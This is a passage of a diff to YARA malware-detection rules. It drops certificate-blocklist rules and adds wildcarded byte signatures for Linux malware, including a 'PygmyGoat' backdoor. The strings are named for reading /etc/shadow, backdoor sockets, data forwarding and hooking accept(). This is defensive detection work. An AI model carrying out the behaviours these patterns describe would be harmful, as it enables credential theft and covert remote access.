+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44
+            0F B7 65 ?? 0F B7 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
+            E0 48 63 D3 EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63
+            D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
+        }
+		$read_etc_shadow_p1 = {
+            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89
+            95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
+            8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ??
+            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8D 3D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 55
+            ?? 41 B9 ?? ?? ?? ?? 41 89 D0 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8D
+            3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B
+            45 ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00
+        }
+		$read_etc_shadow_p2 = {
+            3C ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 0F B6 00 3C ?? 0F 84 ?? ?? ?? ?? 48
+            8B 45 ?? 89 C2 48 8B 45 ?? 89 D1 29 C1 89 C8 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 8B 45 ?? 48 63 D0 48 8D 4D ?? 48 8B 5D ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49 89
+            C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48
+            63 D3 E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ??
+            ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 35 ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 74 ?? 48 8B 45 ?? 48 83 C0 ?? 48
+            89 45 ?? 48 8B 85 ?? ?? ?? ?? 48 03 45 ?? 48 3B 45 ?? 0F 97 C0 84 C0 0F 85 ?? ?? ??
+            ?? EB ?? 90 EB ?? 90 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48
+            8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB
+            ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ??
+            89 D3 49 89 C4 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ??
+            ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3
+            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89
+            E0 48 81 C4 ?? ?? ?? ?? 5B 41 5C C9 C3
+        }
+		$list_running_services_p1 = {
+            55 48 89 E5 41 57 41 56 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89
+            B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 8D 55 ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3 49
+            89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 E9 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 C0 ?? 48 8D 35 ?? ?? ?? ?? 48
+            89 C7 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ??
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F 94 C0 84 C0 74 ??
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 89 45 ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 4D ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$list_running_services_p2 = {
+            8D 95 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 0F 85 ?? ?? ?? ??
+            BB ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 41 BE ?? ?? ?? ?? 48 8B 45 ?? 48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89
+            C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 84 C0 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 48 8B 45 ??
+            48 8D 48 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 41 BD ?? ?? ??
+            ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? B8 ?? ?? ??
+            ?? EB ?? B8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 45 84 ED 75 ?? EB ?? 41 89 D7 48 89 85 ??
+            ?? ?? ?? 45 84 ED 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 49
+            63 D7 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 41 89 D5 49 89 C7 45 84 E4 74
+            ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 F8 49 63 D5 41 89 D4 49 89 C5 84 DB 74
+            ?? EB ?? 45 84 E4 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 4C 89 E8 49 63 D4 EB ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? EB ?? 89 D3 49 89 C4 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89
+            E0 48 63 D3 EB ?? 45 84 F6 74 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
+        }
+		$list_running_services_p3 = {
+            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ??
+            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89 F8 48 81 C4 ?? ?? ?? ??
+            5B 41 5C 41 5D 41 5E 41 5F C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YNK JAPAN Inc" and pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $kill_and_restart_daemons_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $read_etc_shadow_p* ) ) and ( all of ( $list_running_services_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Pygmygoat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PygmyGoat backdoor."
 		author = "ReversingLabs"
-		id = "0915fae0-ac6f-5a92-ab44-80f840fd5061"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c6ffe84d-c1ae-5856-bd49-4633b049f95c"
+		date = "2025-01-20"
+		modified = "2025-01-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L729-L745"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.PygmyGoat.yara#L1-L135"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "11e076865bfc72b79ca42ca821e4c1d81ea705f3ba7711be8677b648ada859a1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "PygmyGoat"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Les Garcons s'habillent" and pe.signatures [ i ] . serial == "08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "71cf0653-5aab-5d5c-aa3a-f42f40196412"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L747-L763"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$create_backdoor_socket = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 30 89 74 08 ?? 8D 50 ?? 83 E2 ?? 29 D0 01 C1 83
+            E1 ?? C1 E9 ?? 89 D7 89 F0 F3 AB 83 EC ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ??
+            8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
+            C0 ?? 89 45 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
+            ?? ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            83 EC ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ??
+            ?? ?? C6 40 ?? ?? 83 EC ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            66 C7 85 ?? ?? ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 83 C0 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
+            C0 ?? 89 45 ?? 83 EC ?? 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 74 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ??
+            83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
+            ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 8D
+            65 ?? 5B 5E 5F 5D C3
+        }
+		$backdoor_dataforward_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? BE ?? ?? ?? ??
+            BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 D1 89 C2 89 D7 89 F0 FC F3 AB 89 FA 89 4D ?? 89
+            55 ?? 8B 45 ?? 39 45 ?? 0F 4D 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F 88 ?? ?? ?? ??
+            83 7D ?? ?? 0F 88 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ??
+            ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ?? ?? ?? 83 EC ?? 6A ?? 6A
+            ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
+            79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83
+            E0 ?? 8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
+        }
+		$backdoor_dataforward_p2 = {
+            C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 E0 ??
+            8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00
+            83 F8 ?? 75 ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? EB ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ??
+            ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? EB ?? E9
+            ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? B8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
+		$main_constructor = {
+            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 89 45 ?? 8D
+            83 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 EC ?? 6A ?? 8D 45 ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 50
+            8D 83 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 83 EC ?? FF 75
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B 45 ?? 83 F8 ?? 77 ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C2 89 D0 83 EC ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 EC ?? 68 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 89 83 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 8B 83 ?? ?? ?? ??
+            83 EC ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 79 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C2 8B 83 ?? ?? ?? ?? 83 EC ?? 52 8D 55 ?? 52 50 E8 ??
+            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 75 ?? 83 EC
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 EC ?? 8D 83 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 8B 83 ?? ?? ?? ?? 83 EC ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? C9 C3
+        }
+		$hook_accept_function_p1 = {
+            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? 8B 45 ?? 8B 00 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC
+            ?? FF 75 ?? FF 75 ?? FF 75 ?? 8B 45 ?? FF D0 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9
+            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 94 C0
+            0F B6 C0 89 45 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 81 65 ?? ?? ?? ?? ?? 83 EC ?? 6A
+            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? EB ?? 6A ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
+            7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 83 EC ?? 50 8D 83 ?? ?? ?? ??
